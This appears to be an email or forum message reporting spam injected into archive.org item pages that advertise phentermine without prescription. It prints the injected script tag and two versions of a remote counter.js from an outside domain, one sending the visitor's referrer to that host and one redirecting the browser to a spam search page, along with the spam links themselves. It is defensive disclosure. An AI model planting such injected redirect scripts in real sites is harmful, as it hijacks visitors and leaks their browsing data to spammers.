<div>Hello:</div>
<div> </div>
<div>I could take a while to investigate this more but I have no time ATM (veeery busy) and the website is under attack. (should be a matter to try that script on some form. Get a virtual pass for the library, digg in the book publishing forms and report back)
</div>
<div> </div>
<div>Try this links:</div>
<div><a href="http://www.archive.org/details/BuyPhentermineOnline_979">http://www.archive.org/details/BuyPhentermineOnline_979</a><br><a href="http://www.archive.org/details/BuyPhentermine.noPrescriptionBestPriceFreeDelivery">
http://www.archive.org/details/BuyPhentermine.noPrescriptionBestPriceFreeDelivery</a></div>
<div> </div>
<div> </div>
<div>Parts of the HTML follows to help spot the hole</div>
<div> </div>
<div>...</div>
<div><br><a href="/search.php?query=subject:%22 free delivery%22"> free delivery</a></p></div><p xmlns:fo="<a href="http://www.w3.org/1999/XSL/Format">http://www.w3.org/1999/XSL/Format
</a>" class="content" style="text-align:left;"><script language="javascript" src="<a href="http://rico05.com/counter/counter.js?id=950&key=buy+phentermine"></script">
http://rico05.com/counter/counter.js?id=950&key=buy+phentermine"></script</a>><br> </div>
<div>...<br><br> </div>
<div> </div>
<div>/--------- counter.js (called directly) ---------/</div>
<div> </div>
<div>var ref = escape(document.referrer);<br>document.write('\<script language=\"javascript\" src=\"<a href="http://rico05.com/counter/counter.js?ref='">http://rico05.com/counter/counter.js?ref='
</a> + ref + '\"\>\<\/script\>');</div>
<div> </div>
<div>
<div>/----- EOF -----/</div></div>
<div> </div>
<div> </div>
<div> </div>
<div>/--------- counter.js (with referer forged) ---------/</div>
<div> </div>
<div>document.location = '<a href="http://rico05.com/search/?said=951&q=buy">http://rico05.com/search/?said=951&q=buy</a> phentermine';</div>
<div> </div>
<div>/----- EOF -----/</div>
<div> </div>
<div> </div>
<div>And that's it. A lot of money spamming users.</div>
<div>Who is said=951? Ask <a href="http://rico05.com">rico05.com</a> if they are not a bunch of phishers should tell you.</div>
<div> </div>
<div>Regards</div>
<div>Waldo Alvarez</div>